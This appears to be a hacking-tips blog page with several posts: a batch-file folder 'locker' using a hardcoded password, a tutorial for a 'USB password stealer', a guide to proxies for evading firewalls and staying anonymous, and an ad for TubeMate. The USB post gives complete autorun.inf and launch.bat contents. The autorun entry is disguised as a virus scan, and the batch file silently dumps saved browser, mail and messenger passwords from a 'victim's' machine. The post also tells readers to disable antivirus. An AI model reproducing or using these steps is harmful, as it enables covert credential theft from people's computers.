Latest Post

Folder locker:

The following batch script help you in locking up your folder with a password, so the user who
knows the right password can only be able to access the folder, where others don’t (Well this is not quite
secure, but can be useful in learning batch programming, because even a noob can easily identify the
password, or can access the folder without using a password, there are a lot of ways to break it).
The batch file that is given below will create a directory named ‘Locker’, when it gets executed,
then you may place whatever you wish to place inside that directory, once done re-execute the same batch
file, then it will prompt you whether to lock the folder, like this

press ‘y’ and hit enter, then the directory ‘Locker’ Disappears. In order to make the directory re-appear
again, you have to execute the same batch file once again, then it will prompt you to enter the password to
unlock the folder, you have to enter the password as ‘secret’, since it is already mentioned by default in
the program itself.
Once the password is matched, then the folder becomes visible, so that you can access the folder again.
114
So, what happens is that, the folder ‘Locker’ is set with the system and hidden attribute, hence it becomes
invisible, when the batch program is executed again, it prompt for password, which is already set as an
environment variable with a value ‘secret’, when the match is found, the attribute is set to normal and the
folder becomes visible and accessible.
Here is the snippet for the folder locker,
------------------------------------------------------------------------------------------------------------
@echo off
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
115
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
admin
if NOT %pass%== secret goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
------------------------------------------------------------------------------------------------------------


Because looking like an expert is easier than being one.
There’s a lot of people in the world and even more online accounts. Every security system has a flaw and what we’re going to discuss here is just that. Most people, with their eyes on the clock and not a second to spare just tick “Remember Me” on various websites without a second thought thinking it’s going to save their time. This is particularly common among poeple who have a private system, maybe a Laptop that nobody else ever touches or a PC which they have locked with a password. Not knowing that there exist many tools to “recover” saved passwords (More like- to exploit exactly these naive people). Browsers store passwords and account details in cookies. What’s quite surprising is just how little security they offer, even worse, none of the browsers seem to care about encrypting passwords. Most of them have an option to “Show Saved Paswords” in the options menu. We’re going to cut even that out, just plug in a USB- Take it out- and Voila! we have all the passwords. That is what you’ll learn in this tutorial. So, with a goal in mind and not a second to spare, let’s start right away.
Things you will need (See link below):-
MessenPass – MessenPass is a password recovery tool that reveals the passwords of several common instant messenger applications.
Mail PassView – Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc
IE Passview – IE passview is another small program that helps us view stored passwords in Internet explorer.
Protected storage pass viewer(PSPV) – Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.
Password Fox – Password fox is a small program used to view Stored passwords in Mozilla Firefox. (These are the ones I’ve tried and tested. More like these surely exist and you can always Google it out for something possibly better. There are analogous tools for the Chrome browser too. You can find these and tons more at http://www.nirsoft.net/)
So that’s that and now we are ready to create a USB password stealer.
Note: These programs tend to attract a lot of attention from antivirus softwares (Get used to this). Kindly disable your antivirus before performing these steps, at your own risk of course ðŸ˜‰
1. First of all download all 5 tools in your USB. Most of them are just some .exe files (mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe). (You need the softwares completely on your pen drive. Make sure you have all the installation files in your USB[if any])
2. Create a new Notepad and write the following text into it:
[autorun] open=launch.bat
ACTION= Perform a Virus Scan

Save the Notepad and rename it from New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it. (Yep, still no copy-pasting allowed.)
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
Save the Notepad and rename it from New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
These were simple commands to start up our password “recovering” programs as soon as we plug in the USB. What we just did here is simply hook up our launch.bat batch file to the autorun.inf file that automatically runs when the computer detects the USB. In the launch.bat, we started up our programs and provided them with file names as parameters so that each program should put in the passwords in their respective .txt files.
Now your USB password stealer is ready. All you have to do is insert it in your victims computer and a popup will appear, in the popup window select the option (Perform a virus scan) as soon as you will click it, your USB password stealer will do it’s magic and all the passwords saved on the system will be saved in a .txt file. I recommend you try it out on your own system first to see how it should work.
See the last line of our autorun.inf, we are simply specifying the text for the alert dialog. You can type in anything you think is the least suspicious.
This may not work on all operating systems and all different browsers. Your best bet would be to pack in as many diverse programs as you can for giving you the best chance. Also, note that the computer should not have autorun feature disabled for the USB stealer to work.


Hacker priority #1: Keep a low profile.

Let’s start from general meaning of word ‘proxy’. It’s actually an agent/substitute or anybody acting at place of any other. Technically, proxies are used to bypass some firewall restrictions, maintaining anonymity or for many other purposes. Like you can use proxies for accessing social networking sites from your college network which the firewall may restricts.
Let’s understand the common methodology (talking in general terms) You bunk the lecture, requests your friend to speak up your att

Common ways to use proxies-

endance, you get the attendance (in case professor doesn’t’ detect).
Another example, when college firewall doesn’t allow you to connect to a site (say Facebook), You requests a proxy server to bring the web page from Facebook and serve you, Now the firewall thinks you are dealing with a server other than Facebook and allows you to make a connection(in case firewall doesn’t detect ).
Hence you have successfully managed to bypass a firewall. Proxy servers simply act as intermediate between your machine and actual server that you are accessing. Proxy servers are mostly used to maintain anonymity. Suppose you are planning to commit an online crime(although you shouldn’t) you can use a proxy server. The actual webserver doesn’t come to know about you because proxy server is dealing with webserver on your behalf.

(1) Setting in Web Browser

Steps:-
1. First of all log on to whatismyip.com and pen down your current IP.
2. Logon to google.com and search for ‘fresh proxies’ you will get many sites providing you list of IPs and respective port numbers. It must be like this IP:port. Suppose logon to
http://www.digitalcybersoft.com/ProxyList/fresh-proxy-list.shtml

3. Now copy the IP and port no.
4. In Mozilla Firefox browser, go to Tools->Options->Advanced->Network->Settings. Check the option “Manual Proxy Configuration” , fill IP and port no. You can configure the proxies in any browser.
5. Check out whatismyip.com again, hopefully it must have been changed. Similarly you can configure proxies in other web browsers.

(2)Using softwares and applications –

You can download many IP hiding softwares. They are easy to use and freely available on internet. They automatically keep changing your IP after a particular interval of time. As an example, ‘Ultrasoft’ is quite easy to use and very effective but then again there are tons of them out there.

(3) Using websites – 

Many websites (e.g. hidemyass.com ) provide free services to hide you IP address. You can directly visit other websites through them. Although the methods, mentioned above are better for long term, this can be used if you urgently need to visit any website without your service provider or anyone else finding out.

TUBEMATE - The fastest and most famous YouTube vedio downloader by which we can easily download vedios from many other different sites i.e Dailymotion , vimeo , Facebook , youko , Naver , Matacafe , Let TV , daum , Google etc....

[The original fast download technology]
♧Fast download mode(with multiple connections for a download)
♧ Multiple download resolution options
♧Background, multi-download
♧ Resume downloading
♧Convert to MP3 (powered by MP3 Media Converter)
♧Playlist as video/audio(powered by Meridian Player)
♧Share your video finds via Google Buzz, Twitter or e-mail at the tap of a button
♧YouTube search and related videos suggestions
♧Save favorite videos to your YouTube account, create playlists
TubeMate YouTube Downloader enables you to quickly access, search, share, and download YouTube videos.
Because downloading always happens in the background, you can go on watching YouTube, surfing the Internet, tweeting, and listening to your music as you download.
[Available resolutions]
1920x1080(Full-HD): GalaxyTab, Galaxy S2, PC
1280x720(HD): high-end devices
640x360: general devices
320x240: low-end devices
640x360, 854x480(FLV) : Android 2.1 and over
(the available options depend on the quality of the uploaded video and your device)
[CAUTION] There are so many infected fake TubeMates on 'Google Play' and internet.
Please get TubeMate from the verified sites for your safety

Contact Form

Name

Email *

Message *

Powered by Blogger.

Powered by themekiller.com